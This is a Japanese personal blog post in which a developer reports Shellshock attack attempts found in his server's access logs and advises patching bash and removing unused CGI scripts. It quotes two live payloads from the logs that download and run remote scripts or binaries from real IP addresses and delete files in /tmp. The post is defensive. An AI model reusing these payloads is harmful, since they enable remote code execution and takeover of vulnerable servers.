読者です 読者をやめる 読者になる 読者になる

ITの隊長のブログ

ITの隊長のブログです。いや、まだ隊長と呼べるほどには至っていないけど、日々がんばります。CakePHPとPlayFrameworkを使って仕事しています。最近はAngular2をさわりはじめたお(^ω^ = ^ω^)

運用しているサーバが攻撃を受けた

セキュリティ Webサイト開発 linux

スポンサードリンク

http://www.flickr.com/photos/52130944@N08/6600319481
photo by Picatinny Arsenal



運用しているサーバのアクセスログを確認してみたところ、ほげー


攻撃されている・・・!? (°Д°!


内容見る限り、Shell Shock (シェルショック)でしょう。


シェルショック - Wikipedia



あ、全然違う、こっちです。


www.infoq.com



攻撃まとめ

  • perlが使えることを確認したら、(たぶん)的当に用意したサーバに悪用のスクリプトを配置して、それを攻撃するサーバのwgetコマンドを使用して読み込ませて、実行する。その後、痕跡を隠すため、スクリプトファイル削除
"() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://202.191.121.230/ou.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://202.191.121.230/ou.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'
  • これは多すぎて読む気無くす・・・・「China」って、おいおい(わざとかな?)
() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-bsec >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bsec >> /tmp/Run.sh;echo /tmp/China.Z-bsec >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-bsec >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bsec >> /tmp/Run.sh;echo /tmp/China.Z-bsec >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"

(すぐできる)対応策


パッチはすでにでていますので、下記を実行してあげれば問題ないかと

$ yum update bash

感想


怖い!!! ネット怖い!!! ((((;゚Д゚))))ガクガクブルブル


最近公開したサーバ、また yum のupdateを対応していたので、大事には至らないようでしたが、これは怖いなぁ。


あと、攻撃口にもなり得る、cgiスクリプトなどは使わないのなら削除しましょう。


www.ipa.go.jp



サーバ管理者はここを毎日確認したほうがいいかも。。。